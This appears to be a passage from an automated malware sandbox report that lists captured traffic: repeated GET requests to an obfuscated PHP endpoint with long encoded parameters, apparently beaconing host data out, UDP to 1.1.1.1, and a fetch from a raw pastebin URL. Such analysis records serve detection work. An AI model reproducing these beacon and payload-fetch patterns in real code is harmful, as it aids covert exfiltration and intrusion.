Z0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNisHL9JSUmljSpRVavpWSwUlaOpmSy0kaSdkTsZFVOJTSH9UaKpWTsRGVZVzaUp1dJpnTpp1VNNzaUlFNBpWWzsmaOhXSDxUa0sWS2k0QPlXUykVMRpXW6tGVZpmQUl1dRpXW1EERa1mVX1EeFdUT4dGVZdXWy4EMV1mToZ0VZRTRqpVa3lWSPpUaPlWSH50aKd1T31UbahmTX9UMVJTTsZleNhmUXplaSdVWrpkaaVTRU9EaapmWzk0VOlmTqlVeZ1WSzlUaUl2bqlUbOpmWspkaatmTtpVNnpWWpJkaNtmRXl1dVJjTzcmeZhXSHpVeJR0Txk0VNVzZq1UMRRUTpp0QMlGNrlkNJN1ToZUbOhXQU5UbsRlWzcmeORTWqlFNZd0TxUlaapXVX1UMrpmTwcGVPlXRq5kMJRkToZlMNl2dpl0TKl2TpVVbN1mUE1keNdVT3VlMZtGZU50MJpmTop1RN1GaE9UMZRVWzk0RPlXQqlFeJRlT51ERN1mSql0cJlGVp9maJhGZE5kMjRlT0sGROVTW6lVbGR0TqZERNtmQq10MFJjT61EVZJzZU5UNF1WW1smeOFTUEpVaKNETpRzaJZTST1EbWRlTpJEVZJTWU1kMnRVW4tGVONTTX90dJRkT6lFROlmQ65EbGRVT5lkaONTVE1UMZdlTpdXaJ9kSp9UaJR0T6dmeNFTQE1EaspWWrpVbOdXTH9UNRdVTohGVZtmWH1UaadlW6VUbZdXWykFbS1WT1kkaJNXSpRVavpWSwUkaZdXRHpVakRkT1EFVOxmRU1UbWJTW6tGVPdXWqlVbWdUTt5EVOFTSEpVeR1WT31ERNNTSDxUa0sWS2kUaOhmSqplMZRkT6FFVapXWt5EerR0TrpEVOJTTXpFNNRkWpZEROhXRX1EenRkWwUVbOhGbU5Ua3lWSPpUaPl2YU5UMRd0T6lleNhmRE9EaGpnT5VEVO1mUH1EMRJjTrp0RPl3a61ENNpmW5VUbNRTTUp1MRpWSzlUaUl2bqlENBRVWp50RNRTS6llMRRlT0MmeZpmWqlVNVRVTxElaOdXVt50MVRVW0U1VPlGb65EeFJTWwk0QMlGNrlkNJlWWsZ0VZRzZql1dBRVWrRmeOlmUE1EaWdkTz0EVPJTSU1UeJRlTopFVOhXVEp1aWdlTyUUbal2dpl0TKl2TplFROhmRXllaGpnTzkUbOdXTH50drpWT1UkaOVTSE9EakRVTop1VaRTUH5UeVpWT4FlMZlXVtl0cJlGVp9maJlXWU1EaOpXWopERNlmTH1kMRdlWoZ0RPpXTqp1asR1T6FkaZdXSqp1MnRUTsJlaNdXUXpVaKNETpRzaJZTS510dZJjTp5kMZd3YE5keJpmWxUVbaRTQEpVaWpXT3F1VOlXRE9UNBpWT41kMZxmQq5kejpmTpdXaJ9kSp9UaR1WTo50RNNTWHpFerpXW5dmeZdXTX50dNd0ToRmaNp3aqpVbSpnTzU1VOBTVU9kaOpWWpZkaJNXSpRVavpWSxkERaxmTykVeRRVToZEVOJTSy0kejR1T4lleOVTSt5kMZpmTop1RaVTWUpVba1mTohGVahXSDxUa0sWS2k0QOlGZUpVaOdlW410VOpXWE10MRd1T41UbZRTWHpFMZpmW6VkeNxmSU5EejpmT4dmaaRzYE9Uaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdX
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/5YGpPGYJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: pastebin.comConnection: Keep-Alive
